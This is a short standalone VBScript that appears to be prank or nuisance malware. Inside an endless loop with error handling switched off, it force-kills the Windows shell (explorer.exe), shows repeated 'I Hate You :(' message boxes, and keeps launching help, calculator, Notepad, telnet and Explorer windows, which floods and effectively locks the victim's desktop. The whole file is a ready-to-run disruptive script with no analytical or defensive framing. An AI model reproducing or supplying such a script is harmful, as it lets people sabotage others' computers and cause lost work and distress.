do
on error resume next 
set t=createobject("Wscript.Shell") 
set kill = createobject("wscript.shell") 
kill.run"taskkill /f /im explorer.exe",0
msgbox"I Hate You :(",16,"I Hate" 
msgbox"I Hate You :(",48,"I Hate" 
msgbox"I Hate You :(",16,"I Hate"
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"calc.exe" 
t.run"notepad.exe" 
t.run"telnet" 
t.run"help" 
t.run"explorer" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"calc.exe" 
t.run"notepad.exe" 
t.run"telnet" 
t.run"help" 
t.run"help" 
msgbox"I Hate You :(",16,"I Hate" 
t.run"help" 
t.run"help" 
t.run"help"
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"calc.exe" 
t.run"notepad.exe" 
t.run"telnet" 
t.run"help" 
t.run"explorer" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"calc.exe" 
t.run"notepad.exe" 
t.run"telnet" 
t.run"help" 
t.run"help" 
msgbox"I Hate You :(",16,"I Hate" 
t.run"help" 
t.run"help" 
t.run"help"
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"calc.exe" 
t.run"notepad.exe" 
t.run"telnet" 
t.run"help" 
t.run"explorer" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"help" 
t.run"calc.exe" 
t.run"notepad.exe" 
t.run"telnet" 
t.run"help" 
t.run"help" 
msgbox"I Hate You :(",16,"I Hate" 
t.run"help" 
t.run"help" 
t.run"help"
loop